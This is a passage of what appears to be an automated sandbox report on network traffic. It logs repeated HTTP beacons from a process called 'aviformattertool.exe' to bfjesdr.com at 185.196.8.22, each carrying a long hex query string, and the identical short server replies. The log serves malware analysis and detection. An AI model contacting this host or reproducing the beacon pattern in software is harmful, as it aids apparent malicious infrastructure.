    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49780 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:28.463033915 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:28.680557013 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:28.793498993 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:29.010036945 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49781 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:29.322546005 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:29.543780088 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49782 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:29.861105919 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:30.078883886 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49783 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:30.385277033 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:30.607637882 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49784 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:30.916450024 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:31.138622999 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49785 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:31.448833942 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:31.665730953 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:31.777925968 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:31.994685888 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49786 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:32.309164047 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:32.530930996 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49787 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:32.838264942 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:33.055308104 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49788 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:33.354623079 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:33.575634956 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49789 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:33.889100075 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:34.114600897 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49790 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:34.419281006 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:34.637278080 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49791 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:34.993797064 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:35.214732885 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49792 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:36.978112936 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:37.200464964 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49793 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:37.510318041 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:37.727576971 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49794 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:38.044367075 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:38.266396999 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49795 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:38.582840919 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:38.799787998 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49796 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:39.107883930 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:39.329850912 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49797 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:39.641729116 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:39.858006954 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49798 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:40.170829058 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:40.394274950 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49799 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:40.713318110 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:40.930108070 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49800 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:41.253204107 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:41.475627899 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Jan 13, 2024 06:33:41.595482111 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:41.812356949 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49801 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:42.119170904 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:42.347152948 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49802 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:42.650336981 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:42.867069960 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
